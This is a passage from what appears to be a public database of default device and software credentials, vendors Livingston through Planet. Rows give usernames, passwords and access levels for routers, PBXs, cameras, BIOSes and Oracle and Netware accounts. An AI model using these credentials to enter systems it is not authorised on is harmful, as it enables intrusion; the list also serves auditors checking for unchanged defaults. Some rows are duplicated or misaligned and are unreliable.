-Livingston,Livingston officerouter,,,!root,blank,, -Livingston,Officerouter,,Telnet,!root,,, -Livingston,Officerouter,,Telnet,!root,,Admin, -Livingstone,Portmaster 2R,,Telnet,root,,Admin, -Lockdown Networks,All Lockdown Products,up to 2.7,Console,setup,changeme (exclamation),User, -Lockdown,All Lockdown Products,up to 2.7,Console,setup,changeme (exclamation),User, -LogiLink,WL0026,1.68,,admin,1234,Admin,Realtek chipset. Default IP 192.168.2.1 -Logitech,Logitech Mobile Headset,,Bluetooth,,0,audio access,Thierry Zoller (Thierry@sniff-em.com) -Lucent,AP-1000,,,public,private,Admin, -Lucent,AP-1000,,,public,public,, -Lucent,Anymedia,,Console,LUCENT01,UI-PSWD-01,Admin, -Lucent,Anymedia,,Console,LUCENT01,UI-PSWD-01,Admin,requires GSI software -Lucent,Anymedia,,Console,LUCENT02,UI-PSWD-02,Admin, -Lucent,Anymedia,,Console,LUCENT02,UI-PSWD-02,Admin,requires GSI software -Lucent,B-STDX9000,,Multi,(any 3 characters),cascade,, -Lucent,B-STDX9000,,debug mode,,cascade,, -Lucent,B-STDX9000,all,SNMP,,cascade,Admin, -Lucent,CBX 500,,Multi,(any 3 characters),cascade,, -Lucent,CBX 500,,SNMP readwrite,,cascade,, -Lucent,CBX 500,,debug mode,,cascade,, -Lucent,Cajun Family,,,root,root,, -Lucent,Cellpipe 22A-BX-AR USB D,,Console,admin,AitbISP4eCiG,Admin, -Lucent,Cellpipe,20A-GX-UK,Console,,admin,Admin, -Lucent,GX 550,,Multi,(any 3 characters),cascade,, -Lucent,GX 550,,SNMP readwrite,,cascade,, -Lucent,GX 550,,debug mode,,cascade,, -Lucent,MAX,,Multi,,,Admin, -Lucent,MAX-TNT,,Multi,admin,Ascend,, -Lucent,PSAX 1200 and below,,Multi,root,ascend,, -Lucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,, -Lucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,Admin, -Lucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,, -Lucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,Admin, -Lucent,PacketStar,,Multi,Administrator,,Admin, -Lucent,Packetstar (PSAX),,,readwrite,lucenttech1,, -Lucent,Portmaster 2,,,!root,,, -Lucent,System 75,,,bciim,bciimpw,, -Lucent,System 75,,,bcim,bcimpw,, -Lucent,System 75,,,bcms,bcmspw,, -Lucent,System 75,,,bcnas,bcnaspw,, -Lucent,System 75,,,blue,bluepw,, -Lucent,System 75,,,browse,browsepw,, -Lucent,System 75,,,browse,looker,, -Lucent,System 75,,,craft,craft,, -Lucent,System 75,,,craft,craftpw,, -Lucent,System 75,,,cust,custpw,, -Lucent,System 75,,,enquiry,enquirypw,, -Lucent,System 75,,,field,support,, -Lucent,System 75,,,inads,inads,, -Lucent,System 75,,,inads,indspw,, -Lucent,System 75,,,init,initpw,, -Lucent,System 75,,,locate,locatepw,, -Lucent,System 75,,,maint,maintpw,, -Lucent,System 75,,,maint,rwmaint,, -Lucent,System 75,,,nms,nmspw,, -Lucent,System 75,,,rcust,rcustpw,, -Lucent,System 75,,,support,supportpw,, -Lucent,System 75,,,tech,field,, -M-M-O,Webrealm,,HTTP,Administrator,admin,Admin, -MERCURY,234234,234234,SNMP,Administrator,admin,Admin, -MERCURY,KT133A/686B,,SNMP,Administrator,admin,Admin, -MICROSOFT,NT,4,,free user,user,, -MX Linux,MX Linux Live Medium,MX-19.4.1,CLI/Login,demo,demo,user, -MX Linux,MX Linux Live Medium,MX-19.4.1,CLI/Login,root,root,superuser, -MX Linux,MX Linux,,,Free4Me,free4me,Admin, -MacSense,X-Router Pro,,,admin,admin,Admin, -MachSpeed,PC BIOS,,Console,,sp99dd,Admin, -Macromedia,Dreamweaver,,FTP,,admin,Guest, -Magic-Pro,PC BIOS,,Console,,prost,Admin, -Mambo,Site Server,4.x,HTTP,admin,admin,Administrator,http://sourceforge.org/projects/mambo -Manjaro,Manjaro Live System,Linux User,manjaro,manjaro,user access,, -Manjaro,Manjaro Live System,Linux User,root,manjaro,sudo access,, -March Networks,IP Camera system,,HTTP,admin,,, -Marconi,Fore ATM Switches,,Multi,ami,,Admin, -McAfee,SCM 3100,4.1,Multi,scmadmin,scmchangeme,Admin, -McData,FC Switches/Directors,,Multi,Administrator,password,Admin, -McData,i10k Switch,,,McdataSE,redips,admin, -Mediatrix,MDD 2400/2600,,Console,administrator,,Admin, -Megastar,BIOS,,Console,,star,Admin, -Megastar,PC BIOS,,Console,,star,Admin, -Mentec,Micro/RSX,,,MICRO,RSX,Admin, -Mentec,Micro/RSX,,Multi,MICRO,RSX,Admin, -Meridian,PBX,ANY,Telnet,service,smile,System, -Meridian,PBX,ANY,Telnet,service,smile,System,This is the default password on most Meridian systems. -Merit Lilin,IP Camera system,,HTTP,Camera,admin pass,, -Merit Lilin,IP Camera system,,HTTP,Recorder,admin / 1111,, -Messoa,IP Camera system,,HTTP,admin,Model# of camera,, -Micron,,bios,,,,, -Micron,PC BIOS,,Console,,xyzall,Admin, -Micronet,3351 / 3354,,Multi,admin,epicrouter,Admin, -Micronet,Access Point,SP912,Telnet,root,default,Admin, -Micronet,Micronet SP5002,,Console,mac,,Admin, -Micronics,PC BIOS,,Console,,dn_04rjc,Admin, -Microplex,Print Server,,Telnet,root,root,Admin, -Microprocessing,,,,,,,h3kdocs/H3R25C04.pdf -Microsoft,Base Station Access Point,,HTTP,,admin,Admin, -Microsoft,MN-500 Wireless Base Station,,Multi,admin,admin,Admin, -Microsoft,SQL Server,7,Multi,sa,(blank),Admin, -Microsoft,Windows NT,,Multi,(null),,User,Redbutton Hole -Microsoft,Windows NT,,Multi,Guest,,User, -Microsoft,Windows NT,,Multi,User,User,User, -Microsoft,Windows NT,All,,Administrator,,, -Microsoft,Windows NT,All,,Guest,,, -Microsoft,Windows NT,All,,Mail,,, -MikroTik,All Routers,ANY,Telnet/SSH/Webfig/Winbox,admin,,Admin,The default IP Address is 192.168.88.1/24 on ether1 port -Mikrotik,Mikrotik,,Telnet,admin,,Admin, -Mikrotik,Router OS,2/9/2017,HTTP,admin,,Admin, -Mikrotik,Router OS,42775,HTTP,admin,,Admin, -Mikrotik,Router OS,all,Telnet,admin,,Admin,also for SSH and Web access -Milan,mil-sm801p,,Multi,root,root,Admin, -Minolta PagrPro,QMS 4100GN PagePro,,HTTP,,sysadm,Admin, -Minolta QMS,Magicolor 3100,3.0.0,HTTP,admin,,Admin,Gives access toAccounting -Minolta QMS,Magicolor 3100,3.0.0,HTTP,operator,,Admin, -Mintel,Mintel PBX,,,,SYSTEM,Admin, -Mitel,3300 ICP,all,HTTP,system,password,Admin, -Mitel,SX2000,all,Multi,,,Admin, -Mobotix,IP Camera system,,HTTP,admin,meinsm,, -Motorola,Cablerouter,,Telnet,cablecom,router,Admin, -Motorola,Motorola Cablerouter,,,cablecom,router,Admin, -Motorola,Motorola-Cablerouter,,,cablecom,router,, -Motorola,SBG900,,HTTP,admin,motorola,Admin, -Motorola,SURFboard,SBV5120,HTTP,admin,motorola,Admin, -Motorola,WR850G,4.03,HTTP,admin,motorola,Admin,higher revisions likely the same -Motorola,Wireless Router,WR850G,HTTP,admin,motorola,Admin, -Multi-Tech,ProxyServer,,Multi,supervisor,,Admin, -Mutare Software,EVM Admin,All,HTTP,,admin,Admin,http://www.mutare.com/data/kb/EVMAdminGuide.pdf -Mutare,EVM Admin,All,HTTP,,admin,Admin,http://www.mutare.com/data/kb/ -MySQL,MySQL,,Any,root,,Admin, -NAI,Entercept,,Management console,GlobalAdmin,GlobalAdmin,Admin,must be changed at 1st connection -NAI,Intrushield IPS,1200/2600/4000,SSH + Web console,admin,admin123,Admin, -NAI,Intrushield IPS,1200/2600/4000,SSH + Web,admin,admin123,Admin, -NCR,NCR UNIX,,Multi,ncrm,ncrm,Admin, -NEC,WARPSTAR-BaseStation,,Telnet,,,Admin, -NETGEAR,DG834G,3,,admin,password,, -NETIO 4All,PowerPDU 4C,Firmware 3.4.0 and later,HTTP,admin,admin,Administrator,https://www.netio-products.com/files/download/sw/version/NETIO-4x-MANUAL-en_1-3-0.pdf -NGSec,NGSecureWeb,,HTTP,admin,,Admin, -NGSec,NGSecureWeb,,HTTP,admin,asd,Admin, -NOKIA,7360,,Multi,,9999,Admin, -NOMADIX,AG5000,,Telnet,admin,,Admin, -NRG or RICOH,DSc338 Printer,1.19,HTTP,,password,Admin,no user -Nanoteq,NetSeq firewall,*,,admin,NetSeq,, -NeXT,,NeXTStep 3.3,,me,,, -NeXT,NeXTStep,,Multi,root,NeXT,Admin, -NetApp,NetCache,any,,admin,NetCache,Admin, -NetGear,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics page,192.168.0.1/docsisdevicestatus.html -NetGear,RM356,,Telnet,,1234,Admin,shutdown the router via internet -NetGear,WGT624,,HTTP,admin,password,admin, -NetGear,WGT624,2,HTTP,admin,password,Admin, -NetGenesis,NetAnalysis Web Reporting,,HTTP,naadmin,naadmin,Admin, -Netcomm,NB1300,,HTTP,admin,password,Admin, -Netgaer,RH328,,,,1234,, -Netgea,FR314,,HTTP,admin,password,Admin, -Netgear,ADSL Modem DG632,V3.3.0a_cx,HTTP,admin,password,Admin, -Netgear,CG814CCR,2,Multi,cusadmin,highspeed,Admin,Comcast small business router. Default access at 10.1.10.1 -Netgear,DM602,,FTP Telnet and HTTP,admin,password,Admin, -Netgear,FR114P,,HTTP,admin,password,Admin, -Netgear,FSM7326P 24+2 L3 mANAGED PoE Switch,,HTTP,admin,,Admin, -Netgear,FSM7326P 24+2 L3 mANAGED,,HTTP,admin,,Admin, -Netgear,FVS114,GR,HTTP,admin,password,Admin, -Netgear,FVS318,,HTTP,admin,password,Admin, -Netgear,FWG114P,,Multi,,admin,password, -Netgear,GS724t,V1.0.1_1104,HTTP,,password,Admin, -Netgear,GSM7224,,HTTP,admin,,Admin, -Netgear,ISDN-Router RH348,,,,1234,, -Netgear,ME102,,SNMP,,private,Admin,Standard IP-Address is 192.168.0.5 -Netgear,MR-314,3.26,HTTP,admin,1234,Admin, -Netgear,MR314,,Multi,admin,1234,Admin, -Netgear,MR814,,HTTP,admin,password,Admin, -Netgear,MR814,v1,HTTP,admin,password,Admin, -Netgear,RH338,,HTTP,,1234,Admin, -Netgear,RH338,,HTTP,,1234,admin, -Netgear,RH438,,HTTP,,1234,, -Netgear,RH438/ISDN-Router RH348,,HTTP,,1234,Admin, -Netgear,RO318,,Multi,admin,1234,Admin, -Netgear,RP114,3.20-3.26,HTTP,admin,1234,Admin,default http://192.168.0.1 -Netgear,RP114,3.26,Telnet,,1234,Admin, -Netgear,RP614,,HTTP,admin,password,Admin, -Netgear,RT112,,HTTP,admin,1250,, -Netgear,RT311,,HTTP,admin,1234,, -Netgear,RT311,,HTTP,admin,1234,Admin, -Netgear,RT314,,HTTP,admin,1234,, -Netgear,RT314,,HTTP,admin,admin,Admin, -Netgear,RT314,Any,,Admin,1234,, -Netgear,RT338,,,,1234,, -Netgear,ReadyNas Duo,RND2000,,admin,infrant1,Admin,Upto v3 firmware -Netgear,ReadyNas Duo,RND2000,,admin,netgear1,Admin,v4 firmware onwards -Netgear,Router/Modem,,Multi,admin,password,Admin, -Netgear,WG602,1.7.x,HTTP,admin,password,Admin,Default IP: DHCP or 192.168.0.227 -Netgear,WG602,Firmware Version 1.04.0,HTTP,super,5777364,Admin, -Netgear,WG602,Firmware Version 1.5.67,HTTP,super,5777364,Admin, -Netgear,WG602,Firmware Version 1.7.14,HTTP,superman,21241036,Admin, -Netgear,WG602,Firmware Version,HTTP,super,5777364,Admin, -Netgear,WG602,Firmware Version,HTTP,superman,21241036,Admin, -Netgear,WGR614,,Multi,admin,password,admin, -Netgear,WGR614,9,,admin,password,Admin,192.168.1.1 OR www.routerlogin.net -Netgear,WGR614,v4,Multi,admin,password,Admin,192.168.0.1 OR www.routerlogin.net -Netgear,WGR614,v6,HTTP,admin,draadloos,Admin,Dutch routers -Netgear,WGT624,,Serial console,Gearguy,Geardog,Admin,see http://wiki.openwrt.org/OpenWrtDocs/Hardware/Netgear/WGT624 -Netgear,WGT634U,,HTTP,admin,password,Admin, -Netgear,WPN824 / WPN824v2,,HTTP,admin,password,admin, -Netgear,Wifi Router,WGT 624 v3,HTTP,admin,password,Admin,slawcio26 -Netgear,dg834g,,HTTP,admin,password,Admin,it should be work also with dg834gt -Netopia,3351,,Multi,,,Admin, -Netopia,4542,,Multi,admin,noway,Admin, -Netopia,455,v3.1,,,,, -Netopia,Netopia 7100,,,,,, -Netopia,Netopia 9500,,,netopia,netopia,, -Netopia,Netopia 9500,,Telnet,netopia,netopia,Admin, -Netopia,R910,,Multi,admin,,Admin, -Netport,Express 10/100,,multi,setup,setup,Admin, -Netscape,Netscape Enterprise Server,,HTTP,admin,admin,, -Netscape,Netscape Enterprise Server,,HTTP,admin,admin,Administrator, -Netscreen,,,,netscreen,netscreen,, -Netscreen,Firewall,,multi,netscreen,netscreen,Admin, -Netscreen,NS-5/NS10/NS-100,2,,netscreen,netscreen,, -Netscreen,firewall,,Multi,admin,,Admin, -Netscreen,firewall,,Telnet,Administrator,,Admin, -Netscreen,firewall,,Telnet,operator,,Admin, -Netstar,Netpilot,,Multi,admin,password,Admin,http://www.netpilot.com/products/netpilot/faq/default.asp -Network Appliance,NetCache,any,Multi,admin,NetCache,Admin, -Network Associates,WebShield Security Appliance e250,,HTTP,e250,e250changeme,Admin, -Network Associates,WebShield Security Appliance e500,,HTTP,e500,e500changeme,Admin, -Network Associates,WebShield Security,,HTTP,e250,e250changeme,Admin, -Network Associates,WebShield Security,,HTTP,e500,e500changeme,Admin, -Network Everywhere,NWR11B,,HTTP,,admin,Admin, -NetworkICE,ICECap Manager,2.0.22 <,8081,iceman,,Admin, -Niksun,NetDetector,,Multi,vcr,NetVCR,Admin,su after login with empty password -Nimble,BIOS,,Console,,xdfk9874t3,Admin, -Nimble,PC BIOS,,Console,,xdfk9874t3,Admin, -Nokia,ADSL router M1921,,Telnet,,nokia,Admin, -Nokia,All Router Models,G-240W-F,HTTP,admin,,admin, -Nokia,DSL Router M1122,1.1-1.2,Multi,m1122,m1122,User, -Nokia,M1122,unknown,Multi,,Telecom,Admin,New Zealand -Nokia,M1921,,Telnet,,nokai,Admin, -Nokia,MW1122,,Multi,telecom,telecom,Admin, -Nokia,MW1122,,Multi,telecom,telecom,Admin,Only in New Zealand. -Norman,5.3,,Multi,,,Admin, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,l2,l2,Layer 2 Read Write, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,l3,l3,Layer 3 (and layer 2) Read Write, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,ro,ro,Read Only, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,rw,rw,Read Write, -Nortel,Accelar (Passport) 1000 series routing switches,,Multi,rwa,rwa,Read Write All, -Nortel,Bay,,Console,,,Admin, -Nortel,Baystack 350-24T,,Telnet,,secure,Admin, -Nortel,Baystack 450T sw V.4.1.0.6,,,,secure,, -Nortel,Business Communications Manager,3.5 and 3.6,HTTPS,supervisor,PlsChgMe,Admin,there is an exclamation point at the end of the password -Nortel,Contivity Extranet Switches,2.x,,admin,setup,, -Nortel,Contivity,Extranet/VPN switches,HTTP,admin,setup,Admin, -Nortel,Extranet Switches,,Multi,admin,setup,Admin, -Nortel,Matra 6501 PBX,,Console,,0,Admin, -Nortel,Meridian 1 PBX,OS Release 2,,0,0,, -Nortel,Meridian CCR,,Multi,ccrusr,ccrusr,User account, -Nortel,Meridian CCR,,Multi,disttech,4tas,engineer account,enter 3letter of day from yesterday an tomorrow (for Tuesday enter MonWed case sensitive) - may be twice to see root password in clear -Nortel,Meridian CCR,,Multi,maint,maint,Maintenance account, -Nortel,Meridian CCR,,Multi,service,smile,general engineer account, -Nortel,Meridian Link,,Multi,disttech,4tas,engineer account, -Nortel,Meridian Link,,Multi,maint,maint,Maintenance account, -Nortel,Meridian Link,,Multi,mlusr,mlusr,user account, -Nortel,Meridian Link,,Multi,service,smile,general engineer account, -Nortel,Meridian MAX,,Multi,maint,ntacdmax,Maintenance account, -Nortel,Meridian MAX,,Multi,root,3ep5w2u,Admin, -Nortel,Meridian MAX,,Multi,service,smile,general engineer account, -Nortel,Meridian PBX,,Serial,login,0,,AUTH codes in LD 8 -Nortel,Meridian PBX,,Serial,login,1111,,AUTH codes in LD 8 -Nortel,Meridian PBX,,Serial,login,8429,,AUTH codes in LD 8 -Nortel,Meridian PBX,,Serial,spcl,0,,AUTH codes in LD 8 -Nortel,Meridian,,Multi,,,Admin, -Nortel,Norstar Modular ICS,,,**ADMIN (**23646),ADMIN (23646),Admin, -Nortel,Norstar,,Console,266344,266344,Admin, -Nortel,Passport 2430,,Telnet,Manager,,Admin, -Nortel,Phone System,All,From Phone,,266344,Installers, -Nortel,Remote Annex 2000,,,admin,(ip address),Admin, -Nortel,Remote Office 9150,,Client,admin,root,Admin, -Nortel,Shasta,any,,admin,admin,, -Nortel,VPN Gateway,,Console,admin,admin,Admin, -Northern,IP Camera system,,HTTP,admin,12345,, -Novell,NetWare,Any,,GATEWAY,,, -Novell,NetWare,Arcserve,,CHEY_ARCHSVR,WONDERLAND,, -Novell,Netware,,Multi,ADMIN,ADMIN,, -Novell,Netware,,Multi,ARCHIVIST,,, -Novell,Netware,,Multi,BACKUP,,, -Novell,Netware,,Multi,CHEY_ARCHSVR,,, -Novell,Netware,,Multi,FAX,,, -Novell,Netware,,Multi,FAXUSER,,, -Novell,Netware,,Multi,FAXWORKS,FAXWORKS,, -Novell,Netware,,Multi,GATEWAY,,, -Novell,Netware,,Multi,GUEST,GUEST,, -Novell,Netware,,Multi,GUEST,GUESTGUEST,, -Novell,Netware,,Multi,HPLASER,,, -Novell,Netware,,Multi,LASER,,, -Novell,Netware,,Multi,LASERWRITER,LASERWRITER,, -Novell,Netware,,Multi,MAIL,,, -Novell,Netware,,Multi,POST,,, -Novell,Netware,,Multi,PRINT,,, -Novell,Netware,,Multi,PRINTER,,, -Novell,Netware,,Multi,ROOT,,, -Novell,Netware,,Multi,ROUTER,,, -Novell,Netware,,Multi,SUPERVISOR,NETFRAME,, -Novell,Netware,,Multi,SUPERVISOR,NF,, -Novell,Netware,,Multi,SUPERVISOR,SUPERVISOR,, -Novell,Netware,,Multi,SUPERVISOR,SYSTEM,, -Novell,Netware,,Multi,TEST,,, -Novell,Netware,,Multi,USER_TEMPLATE,USER_TEMPLATE,, -Novell,Netware,,Multi,WANGTEK,WANGTEK,, -Novell,Netware,,Multi,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,, -Novell,Netware,,Multi,WINSABRE,SABRE,, -Novell,iChain,1.5,Console,,san fran 8,Admin, -Novell,iChain/ICS,1.2 2.0,Telnet,,root,Admin, -Nullsoft,Shoutcast,1/9/2005,PLS,admin,changeme,Admin, -Nullsoft,Shoutcast,38361,PLS,admin,changeme,Admin, -Nurit,PC BIOS,,Console,$system,,Admin, -OCE,Printers,Hardware,HTTP,,0 and the number of OCE printer,Admin, -OCS Inventory NG,OCS Inventory,ANY,HTTP,admin,admin,Administrator,https://wiki.ocsinventory-ng.org/03.Basic-documentatiodministration-of-OCS-Inventory-NG/ -ODS,1094 IS Chassis,4.x,,ods,ods,, -OKI,6120e and 421n,,HTTP,admin,OkiLAN,Admin, -OKI,C5700,,HTTP,root,the 6 last digit of the MAC adress,Admin,running with other models -OMRON,MR104FH,,Multi,,,Admin, -OPEN Networks,812L,,HTTP,root,0P3N,Admin, -OPNsense,OPNsense,ANY,HTTP,root,OPNsense,Administrator,https://docs.opnsense.org/ -ORiNOCO,Access Server,2.01,Telnet,,orinoco,Admin, -Offensive Security,Kali Linux,1.0.0 - 2019.4,Linux User (e.g. SSH & SFTP),root,toor,admin, -Offensive Security,Kali Linux,2020.1+,Linux User (e.g. SSH & SFTP),kali,kali,sudo access,https://www.kali.org/docs/introduction/default-credentials/ -Omnitronix,Data-Link,DL150,Multi,,SMDR,Admin, -Omnitronix,Data-Link,DL150,Multi,,SUPER,Admin, -Omuron,MR104FH,,Multi,,,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,admin,OCS,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,adminstat,OCS,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,adminuser,OCS,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,adminview,OCS,Admin, -OpenConnect,OC://WebConnect Pro,,Multi,helpdesk,OCS,Admin, -OpenNetAdmin,OpenNetAdmin,ANY,HTTP,admin,admin,Administrator,https://github.com/opennetadmin/ona/blob/master/docs/INSTALL -Openwave,MSP,Any,HTTP,cac_admin,cacadmin,Admin, -Openwave,WAP Gateway,Any,HTTP,sys,uplink,Admin, -Optivision,Nac 3000 & 4000,any,,root,mpegvideo,, -Optus,Counter-Strike,1.3,Multi,Administrator,admin,Admin, -Oracle,7 or later,,,system,manager,, -Oracle,7 or later,Any,,Scott,Tiger,, -Oracle,8i,all,,internal,oracle,, -Oracle,Finacial Package,,SAP,SAPR3,SAP,Admin, -Oracle,Glassfish,ANY,HTTP,admin,admin,Administrator,https://docs.oracle.com/cd/E19798-01/821-1751/ghgpu/index.html -Oracle,Oracle RDBMS,7 and 8,Multi,ADAMS,WOOD,, -Oracle,Oracle RDBMS,7 and 8,Multi,APPS,APPS,, -Oracle,Oracle RDBMS,7 and 8,Multi,AURORA@ORB@UNAUTHENTICATED,INVALID,, -Oracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,CTXSYS,DBA, -Oracle,Oracle RDBMS,7 and 8,Multi,DBSNMP,DBSNMP,RESOURCE and CONNECT roles, -Oracle,Oracle RDBMS,7 and 8,Multi,MDSYS,MDSYS,All Privileges with Admin, -Oracle,Oracle RDBMS,7 and 8,Multi,NAMES,NAMES,, -Oracle,Oracle RDBMS,7 and 8,Multi,ORDPLUGINS,ORDPLUGINS,, -Oracle,Oracle RDBMS,7 and 8,Multi,OUTLN,OUTLN,, -Oracle,Oracle RDBMS,7 and 8,Multi,SYSADM,SYSADM,, -Oracle,Oracle RDBMS,7 and 8,Multi,SYSTEM,MANAGER,, -Oracle,Oracle RDBMS,8i Linux,Multi,MODTEST,YES,DBA, -Oracle,Oracle RDBMS,8i WinNT,Multi,MTYSYS,MTYSYS,, -Oracle,Oracle RDBMS,8i WinNT,Multi,RMAIL,RMAIL,, -Oracle,Oracle RDBMS,8i WinNT,Multi,SAMPLE,SAMPLE,DBA, -Oracle,Oracle RDBMS,8i,Multi,,,Admin, -Oracle,Oracle RDBMS,8i,Multi,AQUSER,AQUSER,, -Oracle,Oracle RDBMS,8i,Multi,CATALOG,CATALOG,, -Oracle,Oracle RDBMS,8i,Multi,CDEMOCOR,CDEMOCOR,, -Oracle,Oracle RDBMS,8i,Multi,CDEMOUCB,CDEMOUCB,, -Oracle,Oracle RDBMS,8i,Multi,COMPANY,COMPANY,All Privileges, -Oracle,Oracle RDBMS,8i,Multi,DEMO8,DEMO8,, -Oracle,Oracle RDBMS,8i,Multi,EVENT,EVENT,DBA, -Oracle,Oracle RDBMS,8i,Multi,FND,FND,, -Oracle,Oracle RDBMS,8i,Multi,GPLD,GPLD,, -Oracle,Oracle RDBMS,8i,Multi,MILLER,MILLER,, -Oracle,Oracle RDBMS,8i,Multi,POWERCARTUSER,POWERCARTUSER,, -Oracle,Oracle RDBMS,8i,Multi,PUBSUB,PUBSUB,DBA, -Oracle,Oracle RDBMS,8i,Multi,SECDEMO,SECDEMO,, -Oracle,Oracle RDBMS,8i,Multi,TSDEV,TSDEV,, -Oracle,Oracle RDBMS,8i,Multi,USER0,USER0,, -Oracle,Oracle RDBMS,8i,Multi,USER2,USER2,, -Oracle,Oracle RDBMS,8i,Multi,USER4,USER4,, -Oracle,Oracle RDBMS,8i,Multi,USER6,USER6,, -Oracle,Oracle RDBMS,8i,Multi,USER8,USER8,, -Oracle,Oracle RDBMS,8i,Multi,VRR1,VRR1,DBA, -Oracle,Oracle RDBMS,Any,Multi,system/manager,sys/change_on_install,Admin, -Oracle,OracleRDBMS,8i,Multi,AQUSER,AQUSER,admin, -Oracle,OracleRDBMS,8i,Multi,FND,FND,, -Oracle,Web DB,,HTTP,webdb,webdb,Admin, -Oracle,Web DB,,HTTP,webgb,webdb,, -Osicom (Datacom),Osicom(Datacom),,,sysadm,sysadm,, -Osicom,JETXPrint,1000E/B,Telnet,sysadm,sysadm,Admin, -Osicom,JETXPrint,1000E/N,Telnet,sysadm,sysadm,Admin, -Osicom,JETXPrint,1000T/N,Telnet,sysadm,sysadm,Admin, -Osicom,JETXPrint,500 E/B,Telnet,sysadm,sysadm,Admin, -Osicom,NETCommuter Remote Access Server,,Telnet,debug,d.e.b.u.g,User, -Osicom,NETCommuter Remote Access Server,,Telnet,guest,guest,User, -Osicom,NETCommuter Remote Access Server,,Telnet,sysadm,sysadm,Admin, -Osicom,NETCommuter Remote,,Telnet,sysadm,sysadm,Admin, -Osicom,NETCommuter,Telnet,Manager,Manager,Admin,,No -Osicom,NETCommuter,Telnet,debug,d.e.b.u.g,User,,No -Osicom,NETCommuter,Telnet,echo,echo,User,,No -Osicom,NETCommuter,Telnet,guest,guest,User,,No -Osicom,NETCommuter,Telnet,sysadm,sysadm,Admin,,No -Osicom,NETPrint and JETX Print,500 1000 1500 and 2000 Series,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint and JETX Print,500 1000 1500 and,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1000 T/B,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1000 T/N,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1000E/D,Telnet,debug,d.e.b.u.g,User, -Osicom,NETPrint,1000E/D,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1000E/NDS,Telnet,Manager,Manager,Admin, -Osicom,NETPrint,1000E/NDS,Telnet,echo,echo,User, -Osicom,NETPrint,1000E/NDS,Telnet,guest,guest,User, -Osicom,NETPrint,1000E/NDS,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1500 E/B,Telnet,echo,echo,User, -Osicom,NETPrint,1500 E/B,Telnet,guest,guest,User, -Osicom,NETPrint,1500 E/B,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,1500E/N,Telnet,debug,d.e.b.u.g,User, -Osicom,NETPrint,1500E/N,Telnet,guest,guest,User, -Osicom,NETPrint,2000E/B,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,2000E/N,Telnet,Manager,Manager,Admin, -Osicom,NETPrint,2000E/N,Telnet,echo,echo,User, -Osicom,NETPrint,2000E/N,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,500 1000 1500 and 2000 Series,Telnet,Manager,Manager,Admin, -Osicom,NETPrint,500 1000 1500 and,Telnet,Manager,Manager,Admin, -Osicom,NETPrint,500 E/N,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,500 T/N,Telnet,sysadm,sysadm,Admin, -Osicom,NETPrint,500,1000,1500,and 2000 Series,Telnet,Manager -Osicom,Osicom Plus T1/PLUS 56k,,,write,private,, -Osicom,Osicom Plus T1/PLUS 56k,,Telnet,write,private,, -Otenet,otenet,,Telnet,,,User, -Overland,NEO Series Libraries,,Multi,Factory,56789,Admin,Factory password under Utilities. For all functions unlocked. -PFSense,,Firewall,HTTP/HTTPS,admin,pfsense,, -PHPReactor,PHPReactor,1.2.7,HTTP,core,phpreactor,,http://freshmeat.net/projects/phpreactor/ -Pacific Micro Data,MAST 9500 Universal Disk Array,ESM ver. 2.11 / 1,Console,pmd,,Admin, -Packeteer,Packetshaper,,Console,,touchpwd=,touch,Resets ‘touch’ password. -Palo Alto Networks,GlobalProtect Gateway,ANY,HTTP/CLI,admin,admin,Administrator,https://docs.paloaltonetworks.com/pan-os/9-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html -Panasonic,CF-28,,Multi,,,Admin, -Panasonic,CF-45,,Multi,,,Admin, -Panasonic,IP Camera system,,HTTP,admin,12345,, -Panasonic,IP Camera system,,HTTP,admin1,password,, -Panasonic,PBX TDA 100/200/400,all,Console,,1234,Admin, -Panasonic,kx-td816,,,,1234,Admin, -Pandatel,EMUX,all,,admin,admin,, -Pansonic,KXTD1232,,Multi,admin,1234,Admin, -Patton,RAS,2,,monitor,monitor,, -Pelco,IP Camera system,,HTTP,admin,admin,, -PentaSafe,VigilEnt Security Manager,3,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin, -Pentagram,Cerberus ADSL modem + router,,HTTP,admin,password,Admin, -Pentaoffice,Sat Router,,Telnet,,pento,Admin, -Perle,CS9000,any,Console,admin,superuser,Admin, -Philips,Praesideo PA System,Any,Multi,admin,admin,Admin, -Phoenix v1.14,Phoenix v1.14,,Multi,Administrator,admin,Admin, -Phoenix,4,6.0.2,Multi,,admin,Admin, -Phoenix,bios,,Multi,,,Admin, -Phoenix,dell,,Multi,,admin,Admin, -PiXORD,IP Camera system,,HTTP,admin,admin,, -PiXORD,IP Camera system,,HTTP,root,pass,, -PingTel,Xpressa,1.2.5-1.2.7.4,,admin,,Admin, -Pirelli,AGE ADSL Router,,Multi,admin,microbusiness,Admin, -Pirelli,AGE ADSL Router,,Multi,user,password,User, -Pirelli,DRG A125G,4.5.3,,admin,admin,Admin, -Pirelli,Pirelli AGE-SB,,HTTP,admin,smallbusiness,Admin, -Pirelli,Pirelli Router,,Multi,admin,microbusiness,Admin, -Pirelli,Pirelli Router,,Multi,admin,mu,Admin, -Pirelli,Pirelli Router,,Multi,user,password,Admin, -PlainTree,Waveswitch 100,,,,default.password,Admin, -Planet,ADE-4000,,Multi,admin,epicrouter,Admin, 